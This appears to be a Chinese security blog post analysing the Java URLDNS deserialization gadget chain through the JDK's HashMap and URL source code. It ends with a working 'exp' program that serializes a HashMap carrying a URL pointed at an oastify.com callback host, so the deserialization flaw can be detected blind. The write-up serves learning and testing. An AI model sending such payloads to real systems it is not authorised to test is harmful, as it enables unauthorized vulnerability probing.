URLDNS

S1naG0u Lv2
  2025-02-28 21:35:20 2025-02-28 21:35:20 创建   2025-08-12 16:18:38 2025-08-12 16:18:38 更新    1.2k 字  6 分钟  

本文详细分析了URLDNS反序列化链的利用原理,通过HashMap.readObject()在反序列化时调用hash()方法,触发URL.hashCode()执行getHostAddress()进行DNS解析,实现无回显的漏洞检测。

思考过程:

  1. java.util.HashMap重写了 readObject, 在反序列化时会调用hash函数计算 key 的hashCode
  2. java.net.URLhashCode在计算时会调用 getHostAddress来解析域名, 从而发出 DNS 请求.

先看hashMap.readObject()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
private void readObject(java.io.ObjectInputStream s)
        throws IOException, ClassNotFoundException {
        // Read in the threshold (ignored), loadfactor, and any hidden stuff
        s.defaultReadObject();
        reinitialize();
        if (loadFactor <= 0 || Float.isNaN(loadFactor))
            throw new InvalidObjectException("Illegal load factor: " +
                                             loadFactor);
        s.readInt();                // Read and ignore number of buckets
        int mappings = s.readInt(); // Read number of mappings (size)
        if (mappings < 0)
            throw new InvalidObjectException("Illegal mappings count: " +
                                             mappings);
        else if (mappings > 0) { // (if zero, use defaults)
            // Size the table using given load factor only if within
            // range of 0.25...4.0
            float lf = Math.min(Math.max(0.25f, loadFactor), 4.0f);
            float fc = (float)mappings / lf + 1.0f;
            int cap = ((fc < DEFAULT_INITIAL_CAPACITY) ?
                       DEFAULT_INITIAL_CAPACITY :
                       (fc >= MAXIMUM_CAPACITY) ?
                       MAXIMUM_CAPACITY :
                       tableSizeFor((int)fc));
            float ft = (float)cap * lf;
            threshold = ((cap < MAXIMUM_CAPACITY && ft < MAXIMUM_CAPACITY) ?
                         (int)ft : Integer.MAX_VALUE);

            // Check Map.Entry[].class since it's the nearest public type to
            // what we're actually creating.
            SharedSecrets.getJavaOISAccess().checkArray(s, Map.Entry[].class, cap);
            @SuppressWarnings({"rawtypes","unchecked"})
                Node<K,V>[] tab = (Node<K,V>[])new Node[cap];
            table = tab;

            // Read the keys and values, and put the mappings in the HashMap
            for (int i = 0; i < mappings; i++) {
                @SuppressWarnings("unchecked")
                    K key = (K) s.readObject();
                @SuppressWarnings("unchecked")
                    V value = (V) s.readObject();
                putVal(hash(key), key, value, false, false);
            }
        }
    }

注意最后的putVal使用了hash(key),跟进hash()

1
2
3
4
static final int hash(Object key) {
        int h;
        return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
    }

这里使用了一个hashCode()处理key,此时的key可以是我们传入的URL类的实例,跟进URL.hashCode()

1
2
3
4
5
6
7
public synchronized int hashCode() {
        if (hashCode != -1)
            return hashCode;

        hashCode = handler.hashCode(this);
        return hashCode;
    }

hashCode等于-1时会进入handler.hashCode(this)计算,跟进handler

1
transient URLStreamHandler handler; // transient 关键字,修饰Java序列化对象时,不需要序列化的属性

发现有一个URLStreamHandler,跟进去看看找它的hashCode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
protected int hashCode(URL u) {
        int h = 0;

        // Generate the protocol part.
        String protocol = u.getProtocol();
        if (protocol != null)
            h += protocol.hashCode();

        // Generate the host part.
        InetAddress addr = getHostAddress(u);
        if (addr != null) {
            h += addr.hashCode();
        } else {
            String host = u.getHost();
            if (host != null)
                h += host.toLowerCase().hashCode();
        }

        // Generate the file part.
        String file = u.getFile();
        if (file != null)
            h += file.hashCode();

        // Generate the port part.
        if (u.getPort() == -1)
            h += getDefaultPort();
        else
            h += u.getPort();

        // Generate the ref part.
        String ref = u.getRef();
        if (ref != null)
            h += ref.hashCode();

        return h;
    }

出现getHostAddress(u)此处会进行DNS查询

回到Hashmap.readObject()

1
2
3
4
5
6
7
for (int i = 0; i < mappings; i++) {
                @SuppressWarnings("unchecked")
                    K key = (K) s.readObject();
                @SuppressWarnings("unchecked")
                    V value = (V) s.readObject();
                putVal(hash(key), key, value, false, false);
            }

此处有个key说明在writeObject()时会传入这个key,跟到writeObject()

1
2
3
4
5
6
7
8
9
private void writeObject(java.io.ObjectOutputStream s)
        throws IOException {
        int buckets = capacity();
        // Write out the threshold, loadfactor, and any hidden stuff
        s.defaultWriteObject();
        s.writeInt(buckets);
        s.writeInt(size);
        internalWriteEntries(s);
    }

看到有一个internalWriteEntries(s),接着跟进去看这个方法

1
2
3
4
5
6
7
8
9
10
11
void internalWriteEntries(java.io.ObjectOutputStream s) throws IOException {
        Node<K,V>[] tab;
        if (size > 0 && (tab = table) != null) {
            for (int i = 0; i < tab.length; ++i) {
                for (Node<K,V> e = tab[i]; e != null; e = e.next) {
                    s.writeObject(e.key);
                    s.writeObject(e.value);
                }
            }
        }
    }

仔细看发现key是从tab中复制的,而tab的值即HashMaptable的值。

想要修改table的值,就需要调用HashMap.put()方法,跟进put方法

1
2
3
public V put(K key, V value) {
        return putVal(hash(key), key, value, false, true);
    }

这里同上的putVal(),使用hash()对key进行处理,即进行URL.hashCode()这里会触发DNS请求,为了避免这次请求影响结果,可以使用反射得到URLhashCode属性的值处理为非-1即可避免

链子执行:

反序列化hashMap后->hashMap.readObject()中的putVal()->hash(key)->key.hashCode()即URL.hashCode()->URLStreamHandler.hashCode()->getHostAddress()->触发DNS请求

链子构造:

  1. 使用hashMap.put()url传入
  2. 传入的url会被putVal进行hash处理,得到一个我们想要的url.hashCode()
  3. url.hashCode()此时被触发
  4. 如果此时url的hashCode属性-1当即会被触发一次DNS请求
  5. 为了避免此次请求我们利用反射先将url的hashCode属性先修改为非-1
  6. put执行结束后再改回-1
  7. 最后序列化这个hashMap实例

攻击exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
package serializetest;

import java.io.*;
import java.lang.reflect.Field;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.HashMap;
import java.util.concurrent.Callable;

public class SerializationTest {
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }
    public static void main(String[] args) throws IOException, NoSuchFieldException, IllegalAccessException {
        HashMap <URL,Integer> hashmap = new HashMap();
        URL url = new URL("http://d1fui1w35or3uk8e3m113tjdn4tvhm5b.oastify.com");
        //getClass获取类
        Class c = url.getClass();
        //getDeclareField获取hashCode属性
        Field hashcodefield = c.getDeclaredField("hashCode");
        hashcodefield.setAccessible(true);
        //当hashCode属性是-1时,会在序列化时激活DNS解析,所以先修改为1
        hashcodefield.set(url,1);
        //使用hashmap.put->调用hash->hash又使用了hashCode成功触发
        hashmap.put(url,1);
        //将hashCode的值改为-1,使程序正常执行hashCode
        hashcodefield.set(url,-1);
        //最后序列化hsahmap
        serialize(hashmap);
    }
}

参考资料

Java反序列化 — URLDNS利用链分析

  • 标题: URLDNS
  • 作者: S1naG0u
  • 创建于 : 2025-02-28 21:35:20
  • 更新于 : 2025-08-12 16:18:38
  • 链接: https://s1nag0u.github.io/2025/02/28/URLDNS/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
目录
URLDNS
  1. 思考过程:
  2. 链子执行:
  3. 链子构造:
  4. 参考资料